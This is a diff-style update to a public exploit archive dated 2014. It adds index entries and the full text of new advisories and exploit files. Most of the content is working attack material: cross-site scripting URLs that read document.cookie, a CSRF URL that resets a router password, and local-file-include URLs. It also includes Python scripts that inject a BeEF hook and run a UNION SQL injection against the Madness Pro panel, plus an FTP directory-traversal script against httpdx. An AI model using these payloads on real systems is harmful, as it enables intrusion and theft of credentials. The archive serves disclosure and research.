Updated 06_07_2014

files.csv

@@ -30313,3 +30313,15 @@ id,file,description,date,author,platform,type,port
 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
 33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 Local File Include and Cross Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
+33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross Site Scripting Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0
+33645,platforms/windows/remote/33645.py,"httpdx 1.5 'MKD' Command Directory Traversal Vulnerability",2010-02-15,fb1h2s,windows,remote,0
+33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0
+33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 Multiple Cross Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0
+33648,platforms/hardware/remote/33648.txt,"Huawei HG510 Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0
+33649,platforms/php/webapps/33649.txt,"BGSvetionik BGS CMS 'search' Parameter Cross Site Scripting Vulnerability",2010-02-16,hacker@sr.gov.yu,php,webapps,0
+33650,platforms/php/webapps/33650.txt,"Extreme Mobster 'login' Parameter Cross Site Scripting Vulnerability",2010-02-16,indoushka,php,webapps,0
+33651,platforms/php/webapps/33651.txt,"EziScript Google Page Rank 1.1 Cross Site Scripting Vulnerability",2010-02-16,sarabande,php,webapps,0
+33652,platforms/php/webapps/33652.txt,"New-CMS 1.08 Multiple Local File Include and HTML-Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps,0
+33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 'reloadFrame' Parameter Cross Site Scripting Vulnerability",2010-02-18,"George Christopoulos",multiple,remote,0
+33654,platforms/php/webapps/33654.py,"Madness Pro <= 1.14 - Persistent XSS",2014-06-06,bwall,php,webapps,0
+33655,platforms/php/webapps/33655.py,"Madness Pro <= 1.14 - SQL Injection",2014-06-06,bwall,php,webapps,0

platforms/asp/webapps/33647.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38252/info
+
+Portrait Campaign Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Portrait Campaign Manager 4.6.1.22 is vulnerable; other versions prior to 4.6 SP3 may also be affected. 
+
+
+http://www.example.com/MHCwa/DefaultAn.aspx?LayoutID=<script>alert(&#039;XSS&#039;)</script>

platforms/hardware/remote/33648.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38261/info
+
+Huawei HG510 is prone to multiple cross-site request-forgery vulnerabilities.
+
+Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. 
+
+The following example URI is available:
+
+http://www.example.com/password.cgi?sysPassword=BASE64_NEW_PASSWORD 

platforms/multiple/remote/33653.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38308/info
+
+PortWise SSL VPN is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PortWise SSL VPN 4.6 is vulnerable; other versions may also be affected.
+
+https://www/example.com/wa/auth?&authmech=Assess&reloadFrame=%22;%3Cscript%3Eblah%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

platforms/php/webapps/33644.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38235/info
+
+Basic-CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E 

platforms/php/webapps/33646.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/38250/info
+
+The MS Comment component for Joomla! is prone to a security-bypass vulnerability because it fails to properly sanitize user-supplied input. The component is also prone to a security-bypass vulnerability because it fails to reset the CAPTCHA after a submission.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MS Comment 0.8.0b is vulnerable; other versions may also be affected. 
+
+The following example commands are available:
+
+" onmouseover="alert(String.fromCharCode(88,83,83))
+
+" style="color:expression(alert(String.fromCharCode(88,83,83))) 

platforms/php/webapps/33649.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/38264/info
+
+BGSvetionik BGS CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/?action=search&search=[XSS] 

platforms/php/webapps/33650.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/38265/info
+
+Extreme Mobster is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+
+http://www.example.com/index.php?login=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&pass=indoushka&passconfirm=indoushka&email=indoushka%40hotmail2E.com&stad=1&recruiter=Algeria-hackerz&submit=Sign%20Up

platforms/php/webapps/33651.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/38266/info
+
+EziScript Google Page Rank is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+EziScript Google Page Rank 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/pagerank.php?url="><script>alert(document.cookie)</script>

platforms/php/webapps/33652.txt

@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/38307/info
+
+New-CMS is prone to multiple local file-include vulnerabilities and an HTML-Injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerabilities using directory-traversal strings to view and execute a crafted 'cmd.php' script within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the HTML-Injection issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+New-CMS 1.08 is vulnerable; other versions may also be affected.
+
+
+http://www.example.com/pdf.php?lng=cmd.php
+http://www.example.com/newcms/struttura/manager.php?lng=cmd.php
+http://www.example.com/newcms/struttura/editor/quote.php?lng=cmd.php 

platforms/php/webapps/33654.py

@@ -0,0 +1,39 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+# Exploit Title: Madness Pro <= 1.14 Persistent XSS
+# Date: June 05, 2014
+# Exploit Author: @botnet_hunter
+# Version: 1.14
+# Tested on: Apache2 - Ubuntu - MySQL
+#              ???        ????·       ?????      • ? ? ·.  ?· ??
+#              ??•  ?     ?? ????     •??  ?     ·?? ???????????
+#              ???   ???? ?????? ????  ??.? ???? ?? ?????·??????
+#              ????????.???????????.?? ???·???.???? ?????? ???·.
+#              .???  ?????·????  ????? ???  ???????  ?????  ? •
+#   ??· ?• ?????  ?   ? ?  ?? •     • ? ? ·.  ???· ·????   ? ? ??? ..?? · .?? ·
+#  ?? ????????? ?·?? •?????? ? ?    ·?? ??????? ?? ??? ?? •??????.?·?? ?. ?? ?.
+#  ?? ??????????? ??·??????? ???    ?? ?????·????? ??· ?????????????????????????
+#  ????????????•????????????????    ?? ???????? ?????. ?? ??????????????????????
+#  ·???  ??? .?  ?????? ??·????     ??  ????? ?  ? ?????• ?? ?? ???  ????  ????
+#
+# Unauthenticated persistent XSS in Madness Pro panel <= 1.14
+# Discovered and developed by bwall @botnet_hunter
+#
+# References:
+#	http://blog.cylance.com/a-study-in-bots-lobotomy
+#	
+import urllib
+
+# Fill in URL that Madness Pro bot connects back to
+panel_url = ""
+# Fill in URL to your Javascript payload (the shorter the better)
+beef_hook = ""
+
+
+def install_beef_hook(beef_hook_url, panel_index_url):
+    f = urllib.urlopen("{0}?uid=12345%3Cimg%20alt%3D\\')%3B%5C%22%3E%3Cscript%20src=\"{1}\">%3C%2Fscript%3E%3C%2Fa%3E"
+                       "%3Ca%20href%3D%22%23%22%20onclick%3D%5C%22set_status(\\'12345".format(panel_index_url,
+                                                                                              beef_hook_url))
+    print f.read()
+
+install_beef_hook(beef_hook, panel_url)

platforms/php/webapps/33655.py

@@ -0,0 +1,37 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+# Exploit Title: Madness Pro <= 1.14 SQL injection
+# Date: June 05, 2014
+# Exploit Author: @botnet_hunter
+# Version: 1.14
+# Tested on: Apache2 - Ubuntu - MySQL
+#              ???        ????·       ?????      • ? ? ·.  ?· ??
+#              ??•  ?     ?? ????     •??  ?     ·?? ???????????
+#              ???   ???? ?????? ????  ??.? ???? ?? ?????·??????
+#              ????????.???????????.?? ???·???.???? ?????? ???·.
+#              .???  ?????·????  ????? ???  ???????  ?????  ? •
+#   ??· ?• ?????  ?   ? ?  ?? •     • ? ? ·.  ???· ·????   ? ? ??? ..?? · .?? ·
+#  ?? ????????? ?·?? •?????? ? ?    ·?? ??????? ?? ??? ?? •??????.?·?? ?. ?? ?.
+#  ?? ??????????? ??·??????? ???    ?? ?????·????? ??· ?????????????????????????
+#  ????????????•????????????????    ?? ???????? ?????. ?? ??????????????????????
+#  ·???  ??? .?  ?????? ??·????     ??  ????? ?  ? ?????• ?? ?? ???  ????  ????
+#
+# Unauthenticated SQL injection in Madness Pro panel <= 1.14
+# Proof of Concept retrieves a count of the bots, although it can be utilized for far more
+# Discovered and developed by bwall @botnet_hunter
+#
+# References:
+#	http://blog.cylance.com/a-study-in-bots-lobotomy
+#	
+import urllib
+
+# Fill in URL that Madness Pro bot connects back to
+panel_url = ""
+
+
+def run_sqli_proof_of_concept(panel_index_url):
+    f = urllib.urlopen("{0}?uid='%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,CONCAT('bot-count:',COUNT(*))%20FROM%20bots"
+                       "%20--%20--".format(panel_index_url))
+    print f.read()
+
+run_sqli_proof_of_concept(panel_url)

platforms/windows/remote/33645.py

@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/38242/info
+
+The 'httpdx' program is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue allows an authenticated user to create directories outside the FTP root directory, which may lead to other attacks.
+
+This issue affects httpdx 1.5; other versions may also be affected. 
+
+# Exploit Title: httpdx - ultralight http/ftp server directory Traversal
+# Date: 14/2/2010
+# Author: FB1H2S
+# Software Link: http://sourceforge.net/projects/httpdx/
+# Version: v1.5
+# Tested on: WIN XP2
+# CVE : [if exists]
+# Code : Attached
+ 
+#!/usr/bin/python
+# Greetz to all Darkc0de, Andhra Hackers and ICW Memebers                              
+#Thanks  : Mr bond,Wipu,GOdwinAustin,The_empty,beenu,hg_H@x0r,r45c4l,it_security,eberly
+#Shoutz  : SMART_HAX0R,j4ckh4x0r,41w@r10r,Hackuin
+import socket
+import sys
+hostname='localhost'
+username='admin'
+passwd='password'
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+try:
+    sock.connect((hostname, 21))
+except:
+    print ("Connection error!")
+    sys.exit(1)
+r=sock.recv(1024)
+sock.send("user %s\r\n" %username)
+r=sock.recv(1024)
+sock.send("pass %s\r\n" %passwd)
+r=sock.recv(1024)
+# The FTP root is example.com we could move down the root directory
+sock.send("MKD ../fb1h2s\r\n")
+sock.close()
+sys.exit(0);